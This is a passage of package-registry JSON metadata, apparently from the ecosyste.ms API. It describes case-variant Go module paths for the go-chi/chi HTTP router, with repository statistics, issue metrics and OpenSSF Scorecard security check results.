nts":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-08T10:51:33.563Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":4.926933158137311,"dependent_packages_count":4.616412160775715,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.771672659456513},"purl":"pkg:golang/github.com/go-ch%21i/chi","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/go-chI/chi","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/go-chI/chi","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/go-chI/chi/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chI%2Fchi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chI%2Fchi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chI%2Fchi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chI%2Fchi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chI%2Fchi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-chI%2Fchi/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":14842245,"name":"github.com/gO-chi/chi/v5","ecosystem":"go","description":null,"homepage":null,"licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/gO-chi/chi","keywords_array":[],"namespace":null,"versions_count":24,"first_release_published_at":"2021-02-28T00:11:55.000Z","latest_release_published_at":"2026-07-05T18:51:45.000Z","latest_release_number":"v5.3.1","last_synced_at":"2026-08-12T02:06:15.127Z","created_at":"2026-07-30T09:25:12.018Z","updated_at":"2026-08-12T02:06:15.127Z","registry_url":"https://pkg.go.dev/github.com/gO-chi/chi/v5","install_command":"go get github.com/gO-chi/chi/v5","documentation_url":"https://pkg.go.dev/github.com/gO-chi/chi/v5#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-08T10:51:33.565Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":4.837145431535235,"dependent_packages_count":4.532436673872285,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.68479105270376},"purl":"pkg:golang/github.com/g%21o-chi/chi/v5","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/gO-chi/chi/v5","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/gO-chi/chi/v5","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/gO-chi/chi/v5/dependencies","status":null,"funding_links":["https://github.com/sponsors/pkieltyka"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-05T21:35:35.662Z","issues_count":173,"pull_requests_count":264,"avg_time_to_close_issue":12477255.268518519,"avg_time_to_close_pull_request":9586229.069148935,"issues_closed_count":108,"pull_requests_closed_count":187,"pull_request_authors_count":141,"issue_authors_count":161,"avg_comments_per_issue":3.098265895953757,"avg_comments_per_pull_request":0.9204545454545454,"merged_pull_requests_count":106,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":13,"past_year_pull_requests_count":81,"past_year_avg_time_to_close_issue":2306211.8,"past_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FgO-chi%2Fchi%2Fv5/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FgO-chi%2Fchi%2Fv5/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FgO-chi%2Fchi%2Fv5/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FgO-chi%2Fchi%2Fv5/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FgO-chi%2Fchi%2Fv5/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2FgO-chi%2Fchi%2Fv5/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":10867425,"name":"github.com/go-CHI/chi","ecosystem":"go","description":"","homepage":"https://github.com/go-CHI/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-CHI/chi","keywords_array":[],"namespace":"github.com/go-CHI","versions_count":8,"first_release_published_at":"2016-03-31T13:51:57.000Z","latest_release_published_at":"2023-09-07T09:35:12.000Z","latest_release_number":"v1.5.5","last_synced_at":"2026-08-12T02:06:15.209Z","created_at":"2024-09-08T08:05:25.017Z","updated_at":"2026-08-12T02:06:15.209Z","registry_url":"https://pkg.go.dev/github.com/go-CHI/chi","install_command":"go get github.com/go-CHI/chi","documentation_url":"https://pkg.go.dev/github.com/go-CHI/chi#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security 